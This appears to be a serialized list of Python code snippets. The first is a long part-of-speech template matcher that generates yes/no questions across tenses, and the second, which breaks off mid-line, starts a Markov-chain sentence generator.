'VBG', 'VBP', 'IN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Is' + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['VBG']] + ' ' + \"anything\" + ' ' + line.words[bucket['IN']] + ' ' + j[0] + '?'\n pattern_name = \"PRCIN5\"\n questions.append(question)\n\n elif all(key in bucket for key in PRC5): # 'NNPS', 'VBG', 'VBP', 'IN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Is' + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['VBG']] + ' ' + j[0] + ' ' + '?'\n pattern_name = \"PRC5\"\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n elif all(key in bucket for key in PRCDT6): # 'NNPS', 'VBG', 'VBP', 'IN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Are' + ' ' + line.words[bucket['NNS']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = \"PRCDT6\"\n questions.append(question)\n\n elif all(key in bucket for key in PRCIN6): # 'NNPS', 'VBG', 'VBP', 'IN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Are' + ' ' + line.words[bucket['NNS']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + j[\n 0] + '?'\n pattern_name = \"PRCIN6\"\n questions.append(question)\n\n\n elif all(key in bucket for key in PRC6): # 'NNPS', 'VBG', 'VBP', 'IN' in sentence.\n question = 'Are' + ' ' + line.words[bucket['NNS']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = \"PRC6\"\n questions.append(question)\n\n ########################## Past Cont. ###################################\n elif all(key in bucket for key in PACDT1): # 'PRP', 'VBG', 'VBP', 'IN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Was' + ' ' + line.words[bucket['NNP']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = \"PACDT1\"\n questions.append(question)\n\n elif all(key in bucket for key in PACIN1): # 'PRP', 'VBG', 'VBP', 'IN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Was' + ' ' + line.words[bucket['NNP']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + j[\n 0] + '?'\n pattern_name = \"PACIN1\"\n questions.append(question)\n\n\n elif all(key in bucket for key in PAC1): # 'PRP', 'VBG', 'VBP', 'IN' in sentence.\n question = 'Was' + ' ' + line.words[bucket['NNP']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = \"PAC1\"\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n elif all(key in bucket for key in PACDT2): # 'NNP', 'VBG', 'VBD', 'IN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Were' + ' ' + line.words[bucket['NNPS']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = \"PACDT2\"\n questions.append(question)\n\n elif all(key in bucket for key in PACIN2): # 'NNP', 'VBG', 'VBD', 'IN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Were' + ' ' + line.words[bucket['NNPS']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + j[\n 0] + '?'\n pattern_name = \"PACIN2\"\n questions.append(question)\n\n elif all(key in bucket for key in PAC2): # 'NNP', 'VBG', 'VBD', 'IN' in sentence.\n question = 'Were' + ' ' + line.words[bucket['NNPS']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = \"PAC2\"\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n elif all(key in bucket for key in PACDT3): # 'NNP', 'VBG', 'VBD' in sentence.\n if line.words[bucket['PRP']] in ['he', 'she', 'it']:\n if line.words[bucket['NN']] != j[0]:\n question = 'Was' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = \"PACDT3\"\n questions.append(question)\n\n elif all(key in bucket for key in PACIN3): # 'NNP', 'VBG', 'VBD' in sentence.\n if line.words[bucket['PRP']] in ['he', 'she', 'it']:\n if line.words[bucket['NN']] != j[0]:\n question = 'Was' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + \\\n j[0] + '?'\n pattern_name = \"PACIN3\"\n questions.append(question)\n\n elif all(key in bucket for key in PAC3): # 'NNP', 'VBG', 'VBD' in sentence.\n if line.words[bucket['PRP']] in ['he', 'she', 'it']:\n question = 'Was' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = \"PAC3\"\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n elif all(key in bucket for key in PACDT4): # 'NNPS', 'VBG', 'VBD' in sentence.\n if line.words[bucket['PRP']] in ['i', 'you', 'we', 'they']:\n if line.words[bucket['NN']] != j[0]:\n question = 'Were' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = \"PACDT4\"\n questions.append(question)\n\n elif all(key in bucket for key in PACIN4): # 'NNPS', 'VBG', 'VBD' in sentence.\n if line.words[bucket['PRP']] in ['i', 'you', 'we', 'they']:\n if line.words[bucket['NN']] != j[0]:\n question = 'Were' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + \\\n j[0] + '?'\n pattern_name = \"PACIN4\"\n questions.append(question)\n\n elif all(key in bucket for key in PAC4): # 'NNPS', 'VBG', 'VBD' in sentence.\n if line.words[bucket['PRP']] in ['i', 'you', 'we', 'they']:\n question = 'Were' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = \"PAC4\"\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n elif all(key in bucket for key in PACDT5): # 'PRP', 'VBG', 'VBP', 'IN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Was' + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['VBG']] + ' ' + \"anything\" + ' ' + line.words[bucket['IN']] + ' ' + line.words[\n bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = \"PACDT5\"\n questions.append(question)\n\n elif all(key in bucket for key in PACIN5): # 'PRP', 'VBG', 'VBP', 'IN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Was' + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['VBG']] + ' ' + 'anything' + ' ' + line.words[bucket['IN']] + ' ' + j[0] + '?'\n pattern_name = \"PACIN5\"\n questions.append(question)\n\n elif all(key in bucket for key in PAC5): # 'PRP', 'VBG', 'VBP', 'IN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Was' + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['VBG']] + ' ' + j[0] + ' ' + '?'\n pattern_name = \"PAC5\"\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n elif all(key in bucket for key in PACDT6): # 'PRP', 'VBG', 'VBP', 'IN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Were' + ' ' + line.words[bucket['NNS']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + \\\n line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = \"PACDT6\"\n questions.append(question)\n\n elif all(key in bucket for key in PACIN6): # 'PRP', 'VBG', 'VBP', 'IN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Were' + ' ' + line.words[bucket['NNS']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + j[\n 0] + '?'\n pattern_name = \"PACIN6\"\n questions.append(question)\n\n elif all(key in bucket for key in PAC6): # 'PRP', 'VBG', 'VBP', 'IN' in sentence.\n question = 'Were' + ' ' + line.words[bucket['NNS']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = \"PAC6\"\n questions.append(question)\n\n ############################## Present Simple ######################################\n elif all(key in bucket for key in PRSDT1): # 'NNP', 'VBZ', 'NN' in sentence\n if line.words[bucket['NN']] != j[0]:\n question = 'Does' + ' ' + line.words[bucket['NNP']] + ' ' + line.words[\n bucket['VBZ']].singularize() + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = 'PRSDT1'\n questions.append(question)\n\n elif all(key in bucket for key in PRSIN1): # 'NNP', 'VBZ', 'NN' in sentence\n if line.words[bucket['NN']] != j[0]:\n question = 'Does' + ' ' + line.words[bucket['NNP']] + ' ' + line.words[\n bucket['VBZ']].singularize() + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + j[0] + '?'\n pattern_name = 'PRSIN1'\n questions.append(question)\n\n\n elif all(key in bucket for key in PRS1): # 'NNP', 'VBZ', 'NN' in sentence\n question = 'Does' + ' ' + line.words[bucket['NNP']] + ' ' + line.words[\n bucket['VBZ']].singularize() + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'PRS1'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n elif all(key in bucket for key in PRSDT2): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Does ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBZ']].singularize() + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = 'PRSDT2'\n questions.append(question)\n\n elif all(key in bucket for key in PRSIN2): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Does ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBZ']].singularize() + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + j[0] + '?'\n pattern_name = 'PRSIN2'\n questions.append(question)\n\n\n elif all(key in bucket for key in PRS2): # 'NNP', 'VBZ' in sentence.\n question = 'Does ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBZ']].singularize() + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'PRS2'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n elif all(key in bucket for key in PRSDT3): # 'NNPS', 'VBP', 'NN' in sentence\n if line.words[bucket['NN']] != j[0]:\n question = 'Do' + ' ' + line.words[bucket['NNPS']] + ' ' + line.words[\n bucket['VBP']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = 'PRSDT3'\n questions.append(question)\n\n elif all(key in bucket for key in PRSIN3): # 'NNPS', 'VBP', 'NN' in sentence\n if line.words[bucket['NN']] != j[0]:\n question = 'Do' + ' ' + line.words[bucket['NNPS']] + ' ' + line.words[\n bucket['VBP']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + j[0] + '?'\n pattern_name = 'PRSIN3'\n questions.append(question)\n\n elif all(key in bucket for key in PRS3): # 'NNPS', 'VBP', 'NN' in sentence\n question = 'Do' + ' ' + line.words[bucket['NNPS']] + ' ' + line.words[\n bucket['VBP']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'PRS3'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n elif all(key in bucket for key in PRSDT4): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Do ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBP']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = 'PRSDT4'\n questions.append(question)\n\n elif all(key in bucket for key in PRSIN4): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Do ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBP']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + j[0] + '?'\n pattern_name = 'PRSIN4'\n questions.append(question)\n\n elif all(key in bucket for key in PRS4): # 'NNP', 'VBZ' in sentence.\n question = 'Do ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBP']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'PRS4'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n elif all(key in bucket for key in PRSDT5): # 'NNP', 'VBZ', 'NN' in sentence\n if line.words[bucket['NN']] != j[0]:\n question = 'Does' + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['VBZ']].singularize() + ' ' + \"anything\" + ' ' + \\\n line.words[bucket['IN']] + ' ' + line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = 'PRSDT5'\n questions.append(question)\n\n elif all(key in bucket for key in PRSIN5): # 'NNP', 'VBZ', 'NN' in sentence\n if line.words[bucket['NN']] != j[0]:\n question = 'Does' + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['VBZ']].singularize() + ' ' + \"anything\" + ' ' + \\\n line.words[bucket['IN']] + ' ' + j[0] + '?'\n pattern_name = 'PRSIN5'\n questions.append(question)\n\n elif all(key in bucket for key in PRS5): # 'NNP', 'VBZ', 'NN' in sentence\n if line.words[bucket['NN']] != j[0]:\n question = 'Does' + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['VBZ']].singularize() + ' ' + j[0] + ' ' + '?'\n pattern_name = 'PRS5'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n elif all(key in bucket for key in PRSDT6): # 'NNP', 'VBZ', 'NN' in sentence\n if line.words[bucket['NN']] != j[0]:\n question = 'Do' + ' ' + line.words[bucket['NNS']] + ' ' + line.words[\n bucket['VBP']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + \\\n line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = 'PRSDT6'\n questions.append(question)\n\n elif all(key in bucket for key in PRSIN6): # 'NNP', 'VBZ', 'NN' in sentence\n if line.words[bucket['NN']] != j[0]:\n question = 'Do' + ' ' + line.words[bucket['NNS']] + ' ' + line.words[\n bucket['VBP']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + j[\n 0] + '?'\n pattern_name = 'PRSIN6'\n questions.append(question)\n\n elif all(key in bucket for key in PRS6): # 'NNP', 'VBZ', 'NN' in sentence\n question = 'Do' + ' ' + line.words[bucket['NNS']] + ' ' + line.words[\n bucket['VBP']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'PRS6'\n questions.append(question)\n\n ########################################### End present simple #################################\n\n ##################################################### MD ###########################################\n elif all(key in bucket for key in MD1): # 'NNP', 'VB' in sentence.\n md_word = line.words[bucket['MD']]\n question = md_word.capitalize() + ' ' + line.words[bucket['NNP']] + ' ' + line.words[\n bucket['VB']].singularize() + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'MD1'\n questions.append(question)\n\n elif all(key in bucket for key in MD2): # 'PRP', 'VB' in sentence.\n if line.words[bucket['PRP']] in ['he', 'she', 'it']:\n md_word = line.words[bucket['MD']]\n question = md_word.capitalize() + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VB']].singularize() + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'MD2'\n questions.append(question)\n\n elif all(key in bucket for key in MD3): # 'NNPS', 'VB' in sentence.\n md_word = line.words[bucket['MD']]\n question = md_word.capitalize() + ' ' + line.words[\n bucket['NNPS']] + ' ' + line.words[bucket['VB']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'MD3'\n questions.append(question)\n\n elif all(key in bucket for key in MD4): # 'NNS', 'VB' in sentence.\n if line.words[bucket['PRP']] in ['i', 'you', 'we', 'they']:\n md_word = line.words[bucket['MD']]\n question = md_word.capitalize() + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VB']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'MD4'\n questions.append(question)\n\n elif all(key in bucket for key in MD5): # 'NNP', 'VB' in sentence.\n if line.words[bucket['NN']] != j[0]:\n md_word = line.words[bucket['MD']]\n question = md_word.capitalize() + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['VB']].singularize() + ' ' + j[0] + '?'\n pattern_name = 'MD5'\n questions.append(question)\n\n elif all(key in bucket for key in MD6): # 'NNP', 'VB' in sentence.\n md_word = line.words[bucket['MD']]\n question = md_word.capitalize() + ' ' + line.words[\n bucket['NNS']] + ' ' + line.words[bucket['VB']].singularize() + ' ' + line.words[\n bucket['NN']] + ' ' + '?'\n pattern_name = 'MD6'\n questions.append(question)\n ####################################### End MD ###############################################\n ###################################### JJ ####################################################\n elif all(key in bucket for key in JJ1): # 'NNP', 'VB' in sentence.\n question = 'Is' + ' ' + line.words[bucket['NNP']] + ' ' + line.words[bucket['JJ']] + '?'\n pattern_name = 'JJ1'\n questions.append(question)\n\n elif all(key in bucket for key in JJ2): # 'PRP', 'VB' in sentence.\n question = 'Are' + ' ' + line.words[bucket['NNPS']] + ' ' + line.words[bucket['JJ']] + '?'\n pattern_name = 'JJ2'\n questions.append(question)\n\n elif all(key in bucket for key in JJ3): # 'NNPS', 'VB' in sentence.\n question = 'Is' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[bucket['JJ']] + '?'\n pattern_name = 'JJ3'\n questions.append(question)\n\n elif all(key in bucket for key in JJ4): # 'NNPS', 'VB' in sentence.\n question = 'Are' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[bucket['JJ']] + '?'\n pattern_name = 'JJ4'\n questions.append(question)\n\n elif all(key in bucket for key in JJ5): # 'NNS', 'VB' in sentence.\n question = 'Is' + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['JJ']] + '?'\n pattern_name = 'JJ5'\n questions.append(question)\n\n elif all(key in bucket for key in JJ6): # 'NNS', 'VB' in sentence.\n question = 'Are' + ' ' + line.words[bucket['NNS']] + ' ' + line.words[bucket['JJ']] + '?'\n pattern_name = 'JJ6'\n questions.append(question)\n ####################################### END JJ ###########################################################\n ########################################### Past simple #################################\n try:\n if all(key in bucket for key in PASDT1): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0] and line.words[bucket['VBD']] not in ['was', 'were']:\n question = 'Did' + ' ' + line.words[bucket['NNP']] + ' ' + lemmatizer.lemmatize(\n line.words[bucket['VBD']], pos=\"v\") + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + \\\n line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = 'PASDT1'\n questions.append(question)\n\n\n elif all(key in bucket for key in PASIN1): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0] and line.words[bucket['VBD']] not in ['was', 'were']:\n question = 'Did ' + line.words[bucket['NNP']] + ' ' + lemmatizer.lemmatize(\n line.words[bucket['VBD']], pos=\"v\") + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + j[0] + '?'\n pattern_name = 'PASIN1'\n questions.append(question)\n\n elif all(key in bucket for key in PAS1): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['VBD']] not in ['was', 'were']:\n question = 'Did ' + line.words[bucket['NNP']] + ' ' + lemmatizer.lemmatize(\n line.words[bucket['VBD']], pos=\"v\") + ' ' + line.words[bucket['NN']] + ' ' + '?'\n\n pattern_name = 'PAS1'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n elif all(key in bucket for key in PASDT2): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0] and line.words[bucket['VBD']] not in ['was', 'were', 'had']:\n if line.words[bucket['PRP']] in ['he', 'she', 'it']:\n question = 'Did ' + line.words[bucket['PRP']] + ' ' + lemmatizer.lemmatize(\n line.words[bucket['VBD']], pos=\"v\") + ' ' + line.words[bucket['NN']] + ' ' + \\\n line.words[bucket['IN']] + ' ' + \\\n line.words[bucket['DT']] + ' ' + j[0] + '?'\n\n pattern_name = 'PASDT2'\n questions.append(question)\n\n elif all(key in bucket for key in PASIN2): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0] and line.words[bucket['VBD']] not in ['was', 'were', 'had']:\n if line.words[bucket['PRP']] in ['he', 'she', 'it']:\n question = 'Did ' + line.words[bucket['PRP']] + ' ' + lemmatizer.lemmatize(\n line.words[bucket['VBD']], pos=\"v\") + ' ' + \\\n line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + j[0] + '?'\n\n pattern_name = 'PASIN2'\n questions.append(question)\n\n elif all(key in bucket for key in PAS2): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['PRP']] in ['he', 'she', 'it']:\n if line.words[bucket['VBD']] not in ['was', 'were', 'had']:\n question = 'Did ' + line.words[\n bucket['PRP']] + ' ' + lemmatizer.lemmatize(\n line.words[bucket['VBD']], pos=\"v\") + ' ' + line.words[bucket['NN']] + ' ' + '?'\n\n pattern_name = 'PAS2'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n elif all(key in bucket for key in PASDT3): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0] and line.words[bucket['VBD']] not in ['was', 'were', 'had']:\n question = 'Did ' + line.words[bucket['NNPS']] + ' ' + lemmatizer.lemmatize(\n line.words[bucket['VBD']], pos=\"v\") + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + \\\n line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = 'PASDT3'\n questions.append(question)\n\n elif all(key in bucket for key in PASIN3): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0] and line.words[bucket['VBD']] not in ['was', 'were', 'had']:\n question = 'Did ' + line.words[bucket['NNPS']] + ' ' + lemmatizer.lemmatize(\n line.words[bucket['VBD']], pos=\"v\") + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + j[0] + '?'\n pattern_name = 'PASIN3'\n questions.append(question)\n\n elif all(key in bucket for key in PAS3): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['VBD']] not in ['was', 'were']:\n question = 'Did ' + line.words[bucket['NNPS']] + ' ' + lemmatizer.lemmatize(\n line.words[bucket['VBD']], pos=\"v\") + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'PAS3'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n elif all(key in bucket for key in PASDT4): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0] and line.words[bucket['VBD']] not in ['was', 'were', 'had']:\n if line.words[bucket['PRP']] in ['i', 'you', 'we', 'they']:\n question = 'Did ' + line.words[bucket['PRP']] + ' ' + lemmatizer.lemmatize(\n line.words[bucket['VBD']], pos=\"v\") + ' ' + line.words[bucket['NN']] + ' ' + \\\n line.words[bucket['IN']] + ' ' + \\\n line.words[bucket['DT']] + ' ' + j[0] + '?'\n\n pattern_name = 'PASDT4'\n questions.append(question)\n\n elif all(key in bucket for key in PASIN4): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0] and line.words[bucket['VBD']] not in ['was', 'were', 'had']:\n if line.words[bucket['PRP']] in ['i', 'you', 'we', 'they']:\n question = 'Did ' + line.words[bucket['PRP']] + ' ' + lemmatizer.lemmatize(\n line.words[bucket['VBD']], pos=\"v\") + ' ' + line.words[bucket['NN']] + ' ' + \\\n line.words[bucket['IN']] + ' ' + j[0] + '?'\n\n pattern_name = 'PASIN4'\n questions.append(question)\n\n elif all(key in bucket for key in PAS4): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['PRP']] in ['i', 'you', 'we', 'they']:\n if line.words[bucket['VBD']] not in ['was', 'were']:\n question = 'Did ' + line.words[bucket['PRP']] + ' ' + lemmatizer.lemmatize(\n line.words[bucket['VBD']], pos=\"v\") + ' ' + line.words[bucket['NN']] + ' ' + '?'\n\n pattern_name = 'PAS4'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n ## PASDT6 before PASDT5 ##\n elif all(key in bucket for key in PASDT6): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0] and line.words[bucket['VBD']] not in ['was', 'were', 'had']:\n question = 'Did ' + line.words[bucket['NNS']] + ' ' + lemmatizer.lemmatize(\n line.words[bucket['VBD']], pos=\"v\") + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + \\\n line.words[bucket['DT']] + ' ' + j[0] + ' ' + '?'\n\n pattern_name = 'PASDT6'\n questions.append(question)\n\n elif all(key in bucket for key in PASIN6): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0] and line.words[bucket['VBD']] not in ['was', 'were', 'had']:\n question = 'Did ' + line.words[bucket['NNS']] + ' ' + lemmatizer.lemmatize(\n line.words[bucket['VBD']], pos=\"v\") + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + j[0] + '?'\n\n pattern_name = 'PASIN6'\n questions.append(question)\n\n elif all(key in bucket for key in PAS6): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['VBD']] not in ['was', 'were', 'had']:\n question = 'Did ' + line.words[bucket['NNS']] + ' ' + lemmatizer.lemmatize(\n line.words[bucket['VBD']], pos=\"v\") + ' ' + line.words[bucket['NN']] + ' ' + '?'\n\n pattern_name = 'PAS6'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n\n elif all(key in bucket for key in PASDT5): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0] and line.words[bucket['VBD']] not in ['was', 'were', 'had']:\n question = 'Did ' + line.words[bucket['NN']] + ' ' + lemmatizer.lemmatize(\n line.words[bucket['VBD']], pos=\"v\") + ' ' + \"anything\" + ' ' + line.words[\n bucket['IN']] + ' ' + \\\n line.words[bucket['DT']] + ' ' + j[0] + ' ' + '?'\n\n pattern_name = 'PASDT5'\n questions.append(question)\n\n elif all(key in bucket for key in PASIN5): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0] and line.words[bucket['VBD']] not in ['was', 'were', 'had']:\n question = 'Did ' + line.words[bucket['NN']] + ' ' + lemmatizer.lemmatize(\n line.words[bucket['VBD']], pos=\"v\") + ' ' + \"anything\" + ' ' + line.words[\n bucket['IN']] + ' ' + j[0] + '?'\n\n pattern_name = 'PASIN5'\n questions.append(question)\n\n\n elif all(key in bucket for key in PAS5): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0] and line.words[bucket['VBD']] not in ['was', 'were', 'had']:\n question = 'Did ' + line.words[bucket['NN']] + ' ' + lemmatizer.lemmatize(\n line.words[bucket['VBD']], pos=\"v\") + ' ' + j[0] + ' ' + '?'\n\n pattern_name = 'PAS5'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n\n except:\n a = 'a'\n ############################################### End past simple #####################################\n # When the tags are generated 's is split to ' and s. To overcome this issue.\n if 'VBZ' in bucket and line.words[bucket['VBZ']] == \"’\":\n question = question.replace(\" ’ \", \"'s \")\n questions.append(question)\n\n # Print the genetated questions as output.\n # if question != '':\n # print('\\n', 'Question: ' + question)\n # print('\\n', 'pattern_name: ' + pattern_name)\n keyword_Questions_dic[key] = questions.copy()\n questions.clear()\n\n\n except:\n # print(' ')\n # print(\"No Modal Questions Generated! Please revise your text.\")\n keyword_Questions_dic[key] = \"No Modal Questions Generated! Please revise your text.\"\n\n return (keyword_Questions_dic)", "def generate_sentence():\n markov_chain = makeMarkovDict(\"text.txt\")\n\n # Pick a random word to begin with.\n first_word = random.choice(markov_chain.keys()) # Illegall\n\n # print first_word\n # random_choice = random.randint(0, len(markov_chain.keys()))\n # index = 0\n # first_word = \"\"\n # for word in markov_chain:\n # print word\n # if index == random_choice:\n # first_word = word\n # break\n # index += 1\n\n # Based on that word, call function to chose the next word.\n # print markov_chain[first_word]\n # print word_selection(markov_chain[first_word])\n\n lenght_of_sentence = 10\n sentence = [first_word] # First word already in there\n for i in range(lenght_of_sentence):\n sentence.append(word_selection(markov_chain[sentence[i]]))\n # Sentence after loop: ['fish', 'red', 'fish', 'two', 'fish', 'red', 'fish', 'red', 'fish', 